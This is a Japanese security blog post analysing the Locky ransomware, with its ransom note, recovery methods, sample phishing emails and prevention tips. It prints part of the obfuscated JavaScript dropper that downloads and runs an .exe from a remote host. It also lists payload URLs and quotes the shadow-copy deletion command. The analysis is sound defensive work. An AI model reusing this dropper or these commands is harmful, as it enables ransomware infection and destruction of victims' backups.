« Amazonをかたるフィッシングサイト | トップページ | PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア »

Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

更新日:
2016-03-29 「感染しないための対策」を追記
2016-03-27 「感染時の動作」、「Locky Decrytor の購入画面」をを追記

Locky Virus - 日本語で身代金を要求するランサムウェアウイルスの対処方法

キーワード: ウイルス、Locky、マルウェア、ランサムウェア、復元、復号、復旧、decrypt, js、javascript、Document2、ransomware, virus, thor, osiris, zzzzz, aesir

このエントリーをはてなブックマークに追加 

目次

1. Locky ウイルスとは

2. 脅迫文

3. 暗号化されたファイルの復旧方法

4. メール添付ファイルの例

5. Locky ウイルスのダウロードURL

6. Locky ウイルス感染時の動作

7. 感染しないための対策

8. 関連リンク

スポンサーリンク

1. Locky ウイルスとは

Locky ウイルスは、感染するとPC内のファイル(テキストやオフィスファイル、画像、動画ファイルなど)を勝手に暗号化してしまうランサムウェアと言われる種類のウイルスです。暗号化されたファイルは、拡張子が「Locky」 となってしまうことから通称「Locky」と呼ばれています。今までのランサムウェアの脅迫文は日本語対応していないものがほとんどでしたが、Locky は日本語環境であれば日本語の脅迫文を作成して表示します。

感染経路としては、メール添付ファイルと脆弱性を攻撃するWebサイトの大きく2つがあります。メール添付ファイルでの感染は、実行すると Locky ウイルスをダウンロードして実行する JavaScriptファイルが含まれた ZIP ファイルが添付されているケースが多いです。その他 rar 拡張子の添付ファイルのケースもあります。また、改ざんされたWebサイトでの感染では、そのWebサイトを見ると Adobe Flash などの脆弱性を攻撃して自動的に Locky Virus をダウンロードして実行する手法(ドライブバイダウンロード)による感染が多く報告されています。このWebサイト経由での感染は、Adobe Flash や IE などのソフトウェアを最新にしておけば感染することはほどんどありません。ランサムウェアなどのウイルスに感染しないように、必ずソフトウェアはアップデートして最新のバージョンにしておきましょう。

1.2. Locky 亜種

Locky ウイルスが出現して間もなく亜種が出回りはじめました。Locky亜種は、初期のLocky と比べて、ダウンロードされるウイルス本体の実行ファイル形式(EXEからDLL形式)や暗号化後のファイル名の形式、拡張子名(.thor.aesir.zzzzz.osirisなどが変わっています。目的はかわらず、感染PC内のファイルを暗号化して人質にして、身代金(ビットコイン支払い)を要求することです。

Locky亜種は、主にメールの添付ファイルとして送られてきます。添付されるファイルの形式は、以下が確認されています。

添付ファイルの形式 ファイルの拡張子
zip zip
The Witcher 2 Game Archive dzip
Microsoft Office doc, docx, docm
  xls, xlsx

zip, dzip などの圧縮ファイルは、展開すると js, wsf, vbs などのスクリプトファイルが入っており、実行してしまうと Locky 亜種の本体であるDLLプログラムをダウンロードして実行します。

doc, docm などのMicrosoft Office のオフィスファイルには、開くと Locky亜種をダウンロードするマクロが入っています。

2. 脅迫文

Locky ウイルスに感染すると表示される日本語の脅迫文です。
  • _Locky_recover_instructions.bmp

_Locky_recover_instructions

  • _Locky_recover_instructions.txt

!!! 重要な情報 !!!!

すべてのファイルは、RSA-2048およびAES-128暗号で暗号化されています。  
RSAの詳細については、ここで見つけることができます:  
http://ja.wikipedia.org/wiki/RSA暗号  
hxxp://ja.wikipedia.org/wiki/Advanced_Encryption_Standard

あなたのファイルの復号化は秘密鍵でのみ可能であり、私たちの秘密のサーバー上にあるプログラムを、復号化します。  
あなたの秘密鍵を受信するには、リンクのいずれかに従います:  
1. hxxp://i3ezlvkoi7fwyood.tor2web.org/AAF92AC11ABCDEF  
2. hxxp://i3ezlvkoi7fwyood.onion.to/AAF92AC11ABCDEF  
3. hxxp://i3ezlvkoi7fwyood.onion.cab/AAF92AC11ABCDEF

このすべてのアドレスが使用できない場合は、次の手順を実行します。  
1. ダウンロードして、Torのブラウザをインストールします: hxxps://www.torproject.org/download/download-easy.html  
2. インストールが正常に完了したら、ブラウザを実行し、初期化を待ちます。  
3. アドレスバーにタイプ: i3ezlvkoi7fwyood.onion/AAF92AC11ABCDEF  
4. サイトの指示に従ってください。

!!! 個人識別ID: AAF92AC11ABCDEF !!!

  • Locky Decryptor 購入画面

暗号化されたファイルを復元するためのソフトウェアである Locky Decryptor の要求額は 1.0 Bitcoin のようです。日本円に換算すると5万円弱くらいでしょうか。暗号化されたファイルの重要性によっては、払ってしまいそうな金額です。

脅迫文と同じく、英語、日本語のほか、韓国語、ドイツ語、フランス語、イタリア語など多くの言語をサポートしています。

身代金を払うことは、犯罪者にお金を払ってしまうことになってしまいますし、犯罪を助長することになってしまうのでお勧めしませんが、バックアップなどから復旧できない大切なデータが被害にあった場合は、身代金を払って復号するしか手はなさそうです。

LockyDecryptor 

3. 暗号化されたファイルの復旧方法

スポンサーリンク

暗号化されたファイルの復旧する 3 つの方法を紹介します。

(1) バックアップから復旧

バックアップから復旧することが一番簡単な方法です。ランサムウェアの被害に限らず、インシデントが発生するとバックアップの大切さがわかります。

(2) ボリュームシャドーコピーからの復旧

Vista/7 以降のWindowsは、標準でファイルの自動バックアップサービスが動いています。ファイルのプロパティのタブで「以前のバージョン」で表示されるものがバックアップされたファイルになります。

いつの時点のボリュームシャドーコピーがあるかなどを確認する方法です。管理者権限のコマンドプロンプトで、vssadmin か wmic コマンドを実行すると表示されます。その他、エクスプローラのフォルダやファイルのプロパティから「以前のバージョン」タブを確認する方法もあります。

> vssadmin list shadows

> wmic.exe shadowcopys

ボリュームシャドーコピーが残っていれば、Shadow Explorer というソフトウェア(http://www.shadowexplorer.com/)を使うことで以前のバージョンのファイルを復元することができます。

Locky ウイルスは、感染時にボリュームシャドーコピーを削除するコマンドを実行します。このコマンドには管理者権限が必要なので、一般ユーザ権限で操作をしていたのであれば削除されずに残っている可能性があります。

(3) アンチウイルスベンダーの復号ツールを使う(未確認)

本当に復号できるのか確認検証できていませんが、下記URL に Locky ウイルスに暗号化されたファイルを復元する方法が記載されています。

How to Decrypt Files Affected by Locky

http://www.im-infected.com/virus/remove-locky-ransomware-virus-removal.html

DrWeb の FTP サイトに復号ツール(ftp://ftp.drweb.com/pub/drweb/tools/te94decrypt.exe)があるようですが、認証が必要でダウンロードできませんでした。DrWeb を購入しているユーザのみに公開されているのかもしれません?。DrWeb のライセンスを持っていないので詳細は不明です。

このツールを使って下記コマンドを実行することにより復号できるようです。(確認できていないので、本当に復元できるか不明です)

te94decrypt.exe -k 85

上記コマンドで復号できない場合は、-k オプションの値を -k 87, -k 88, -k 90, -k 106, or –k186 のように変えて試すとよいようです。

(4) 身代金を支払う

最後の手段ですね。

スポンサーリンク

4. メール添付ファイルの例

Locky ウイルスをダウンロードする JavaScript ファイル (ZIP 圧縮ファイル)を添付したメールの一例です。以下、Locky ウイルスに関するメールの特徴です。

  • 件名は Document 2 が多い
  • 差出人と宛先が自分のメールアドレス
  • 本文はなしが多い
  • 添付ファイルは zip で Locky Virus をダウンロードする js ファイルが含まれている

 

4.1 メール添付ファイルの例

  • Scanned images

件名 Scanned image
差出人 "admin" lands804@nifty.com
日時 Fri, 11 Mar 2016 21:28:25 +0530 (IST India Standard Time)
X-Mailer Internet FAX, MGCS
本文 Image data in PDF format has been attached to this email.
添付ファイル 11-03-2016-0424109259.zip (LUH5654603905.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Fri, 18 Mar 2016 07:36:24 –0500 (EST アメリカ東部)
X-Mailer なし
本文 なし
添付ファイル Document 2.zip (中身は SKS6515937204.js)

  • Message from KFBT_C125

件名 Message from KFBT_C125
差出人 copier@nifty.com
日時 Date: Mon, 21 Mar 2016 10:01:42 -0700 (US,カナダ, メキシコ)
X-Mailer KONICA MINOLTA
本文 なし
添付ファイル SKFBT_C0125690141.zip

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:40:13 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は FAM6542645213.js)

  • Document 2

  
件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 16:45:47 +0530 (IST India Standard Time インド)
X-Mailer iPhone Mail (13B143)
本文 なし
添付ファイル Document 2.zip (中身は QVR3975568919.js)

  • Document 2

件名 Document 2
差出人 自分のメールアドレス
日時 Tue, 22 Mar 2016 13:21:42 +0700 (ロシア?)
X-Mailer iPhone Mail
本文 なし
添付ファイル Document 2.zip

  • Locky をダウンロードする Javascript の例(一部)

LUH5654603905.js (一部)

LnOKenpxqU = "If the nodes are siblings, we can do a quick check} else if ( aup === bup ) {return siblingCheck( a, b );";
String.prototype.harmonize = function () { return this.substr(0, 1); };
var zooFq = [("through","sesame","admissions","holes","T")+("scripts","beautify","attacked","arrangements","OQ")+("algeria","cucumber","relation","NF")+"JjAV"+"sY", "c"+("sponsorship","endorsed","finish","JbVL")+"Lh"+"xN", "Expan"+"dE"+"nviron"+"me"+"ntStri"+("stork","sluggish","foxes","ngs"), ""+"%"+("prominent","queens","foregone","susanna","TE")+"MP%", "/BhyIDtNVwP" + ""+"."+("revolve","meyer","shift","reborn","exe"), "R"+("medline","demur","arbitrator","un"), ("tumbler","dense","A")+("craig","repine","tramadol","ct")+"iv"+"eX" + ("compression","brewery","guitar","")+"O"+"bj"+"ect", "QGGOKcpS", "QwMELac", "W"+"Sc"+"ri"+("foxes","torture","pt.") + ("problem","inscribe","melissa","octave","S"), "DKiwgen", ""+("withering","andrew","shorter","h")+"ell", "pVfOLaUink", ("throttle","cowboy","")+("amalgamation","breast","u")+"gb"+"IRD", ""+("guarantee","breastplate","interpreted","M")+"SX"+"ML2" + "."+"XM"+"LH"+("freeze","pounce","immensity","taciturnity","TTP")];
WeuTVCqwr = "Otherwise nodes in our document sort firstap[i] === preferredDoc ? -1 :bp[i] === preferredDoc ? 1 :0;};";   
zooFq.splice(7,2);   
var CTMoXJF = this[zooFq[7 * 8 - 50]];   
HWKBtgugje = "QADrAWHk";   
midnight = (("deleterious", "greenish", "bpRCgjnvY", "astuteness", "pxoHjzpzAa") + "FCIzdg").harmonize()   
publicitys = (("compared", "cheaper", "QBuFHmOIr", "architects", "shvjRYg") + "FjirdbbvG").harmonize()   
zooFq[7] = zooFq[7] + zooFq[9];   
zooFq[8] = "WyGszYG";   
zooFq.splice(8,3);   
var SjBMgLMBX = new CTMoXJF(zooFq[7]);   
SEVPbSzi = "}Walk down the tree looking for a discrepancywhile ( ap[i] === bp[i] ) {i++;";   
var ivPMRM = new CTMoXJF(zooFq[9]);   
rfQhFwb = "}Otherwise we need full lists of their ancestors for comparisoncur = a;while ( (cur = cur.parentNode) ) {ap.unshift( cur );}cur = b;while ( (cur = cur.parentNode) ) {bp.unshift( cur );";   
var giLwRPLp = SjBMgLMBX[zooFq[2]](zooFq[3]) + zooFq[4];   
SWlMAsjacQk = "}return i ?Do a sibling check if the nodes have a common ancestorsiblingCheck( ap[i], bp[i] ) :";   
ivPMRM.onreadystatechange = function () {   
if (ivPMRM[("animal","ferment","wince","r")+"ea"+("drummer","delicious","romany","thinking","dy")+"st"+("contributor","society","projects","oxygen","ate")] === 4) {   
   var aLcJyART = new CTMoXJF(""+"A"+("outlawed","mined","national","DO")+("derek","elizabethan","cleave","whisk","DB.")+("protuberance","stayed","proverbs","")+("terminus","dunno","madness","graphic","S")+"tr"+"eam");   
   aLcJyART.open();   
   KHvCvfBJOh = " return document; };";  

try {

LNqWai= "IE 9\"s matchesSelector returns false on disconnected nodesif ( ret || support.disconnectedMatch ||  As well, disconnected nodes are said to be in a document  fragment in IE 9 elem.document && elem.document.nodeType !== 11 ) {return ret;}} catch (e) {}";   
ivPMRM.open(("symptom","sigma","colin","G")+"ET", "h"+("propagate","thrown","johnny","ttp:")+"//"+("mohawk","impair","chinhu")+"an"+"oi"+"that.c"+"om/s"+"ys"+"te"+"m/logs/u"+"y78hn6"+("hogshead","action","54")+"e.exe", false);BxpYFBq = "} return Sizzle( expr, document, null, [ elem ] ).length > 0; };";   
ivPMRM[publicitys + ("illogical","quick-witted","grape","xerox","e") + (("promote", "moderately", "gnuUtaRFBS", "viscid", "impure", "nYAgsnHqfY") + "DudCuStvIn").harmonize() + (("miner", "squeal", "IKcQRgYhT", "blame", "concord", "dNdviLv") + "crpvqd").harmonize()]();   
RqrXhxjRF = "Sizzle.contains = function( context, elem ) {Set document vars if neededif ( ( context.ownerDocument || context ) !== document ) {setDocument( context );}return contains( context, elem ); };";   
SjBMgLMBX[zooFq[5]](giLwRPLp, 1, "qPdBvBqXfEO" === "HtIxotr"); xcwJYtK = " return val !== undefined ?val :support.attributes || !documentIsHTML ?elem.getAttribute( name ) :(val = elem.getAttributeNode(name)) && val.specified ?val.value :null; };";   
lrGyXANbYvX = "Sizzle.attr = function( elem, name ) {Set document vars if neededif ( ( elem.ownerDocument || elem ) !== document ) {setDocument( elem );";   
} catch (RaRfcWCIw) { };   
xyQVrCFOYxk = "} var fn = Expr.attrHandle[ name.toLowerCase() ],Don\"t get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;";

5. Locky ウイルスのダウロードURL

メールに添付された zip ファイルに含まれる js ファイルを実行すると HTTP アクセスして、Locky Virus をダウンロード実行します。HTTPアクセス先 URL の一例です。

hxxp://timefusewatches.com/system/logs/3523523.exe
hxxp://palat.com/system/logs/98h7b66gb.exe
hxxp://palahasit.com/system/logs/98h7b66gb.exe

/system/logs/*.exe となっているURLが多いようです。

6. Locky ウイルス感染時の動作

メール経由(js を含む添付ファイル)での感染時の動作です。感染してファイルを暗号化された後は、Locky Virus は自身を削除してしまうため残っていません。このため、暗号化された後に、アンチウイルスソフトウェアでフルスキャンしても見つかりません。メール添付されていた zip or Javascript は残っているので、これらが検知されることはあるかもしれません。

  1. Locky Virus をダウンロードするための Javascript を圧縮した zip ファイルを添付したメールが届く
  2. 添付された zip を開いて Javascript ファイル( 例: LUH5654603905.js)を実行すると、Locky Virus である実行ファイルがダウンロード実行される
  3. Volume Shadow Copy サービスで自動バックアップされているファイルをコマンドで削除する「C:\Windows\System32\wbem\WMIC.exeshadowcopydelete/nointeractive」
  4. Locky C2 (コントロール&コマンド)サーバに通信して暗号化に関する情報をやり取り (hxxp://xxxxxxx/main.php、hxxp://xxxxxxx/gate.php へのPOST通信が多い)
  5. ファイルの暗号化処理
  6. 脅迫文を作成して表示
  7. Locky Virus の実行ファイルを削除 「"C:\Windows\system32\cmd.exe" /c DEL %USERPROFILE%\DOCUME~1\TWRPUI~1.EXE」
             

7. 感染しないための対策

  • Adobe Flash Player を最新バージョンにアップデートする
  • Adobe Reader を最新バージョンにアップデートする
  • Java を最新バージョンにアップデートする
  • Internet Explorer を最新バージョンにアップデートする
  • Windows Update のセキュリティパッチをすべて適用する
  • アンチウイルスソフトの最新パターンにアップデートし、リアルタイム検知を有効にする
  • 問題なければ .js 拡張子の関連付けを、Javascript が実行できないプログラム(例えばnotepad.exe など)に変更する
  • js, wsf, vbs などの関連付けを無効にする
  • js, wsf, vbs などに関連付けられた WScript.exe をグループポリシーや権限などで実行禁止する
  • Microsoft Office のマクロ設定を警告表示もしくは無効にする

各種ソフトウェアやプラグインが最新バージョンになっているかは、情報処理推進機構 IPA が提供している MyJVN パージョンチェッカー(http://jvndb.jvn.jp/apis/myjvn/vccheck.html)で確認できます。

8. 関連リンク

« Amazonをかたるフィッシングサイト | トップページ | PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア »

ウイルス、マルウェア(Malware)」カテゴリの記事

セキュリティ事件、サイバー攻撃」カテゴリの記事

セキュリティ(Security)」カテゴリの記事

ニュース」カテゴリの記事

トラックバック

この記事のトラックバックURL:
http://app.cocolog-nifty.com/t/trackback/503138/63387249

この記事へのトラックバック一覧です: Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法:

« Amazonをかたるフィッシングサイト | トップページ | PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア »

記事一覧

スポンサードリンク


Twitter


無料ブログはココログ

ブログ検索